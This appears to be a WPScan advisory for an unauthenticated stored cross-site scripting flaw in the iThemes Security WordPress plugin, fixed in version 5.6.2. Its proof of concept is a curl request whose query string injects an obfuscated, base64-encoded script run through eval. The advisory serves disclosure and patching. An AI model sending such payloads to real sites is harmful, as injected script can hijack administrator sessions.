iThemes Security <= 5.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)


Description
The plugin's 404 detection module must be enabled for the vulnerability to be reachable.
Proof of Concept
curl "http://ithemesprotected.target/index.php/2016/09/22/trigger-404/?<script>x=String(/YWxlcnQoInRlc3QiKQ==/);x=x.substring(1,x.length-1);eval(atob(x));</script>" -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Cookie: wordpress_test_cookie=WP+Cookie+check' -H 'Connection: keep-alive' -H 'Referer: http://ithemesprotected.target/wp-login.php?da=777&bu=777' --compressed

Affects

Plugin better-wp-security
fixed in version 5.6.2

References

URL https://medium.com/websec/xss-vulnerability-in-ithemes-security-formerly-better-wp-security-5-6-1-2fba71f96f5d#.4ptv9xsb3

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Slavco Mihajloski
Submitter Website https://medium.com/websec
Submitter Twitter https://twitter.com/wpwebsec
Verified No
WPVDB ID 8635

Timeline

Publicly Published 2016-10-06
Added 2016-10-06
Last Updated 2016-10-06

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.